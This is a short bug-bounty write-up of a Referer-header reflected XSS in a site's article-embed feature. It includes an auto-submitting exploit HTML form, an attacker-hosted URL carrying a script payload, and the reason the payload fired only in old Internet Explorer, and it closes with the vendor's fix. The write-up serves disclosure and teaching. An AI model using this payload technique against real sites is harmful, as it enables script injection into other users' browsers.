Referer Based XSS

Severity : Medium

Complexity : High( Exploitable with old version of IE)

Weakness: Using Referer value is response body

• While Testing one of the private on Hackerone . They have functionality to Embed the articles of their user’s on third party site’s.

• While opening the article’s from third party site’s , Noticed that they have a href called “GO BACK! If it Doesn’t Load’s”

• Checking the go back href :

<a href="http://54.147.92.2/test.html">go back</a>
and try again. If this problem persists, please 
<a href="/contact">contact us</a>

• Exploit.html

<script>document.getElementById(’xx’).submit()</script>
<form id=’xx’ name=’exploit’ method=”GET” action="https://site.com/articles/author/embed/112434/"></form>

• When we sent http://54.147.92.2/exploit.html?<script>alert(1);</script> to the victim.
• Referer value get’s set to http://54.147.92.2/exploit.html?<script>alert(1);</script> and by clicking on “GO BACK!” Popup will appear in IE.
• Reason why attack work’s only on IE is Internet Explorer doesn’t filter URL Encode values . Whereas Chrome and Firefox will URL encode the values to

http://54.147.92.2/exploit.html?%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E

• I would like to thank following blog post http://www.gremwell.com/exploiting_xss_in_referer_header

• They have Fixed By using javascript:history.back() :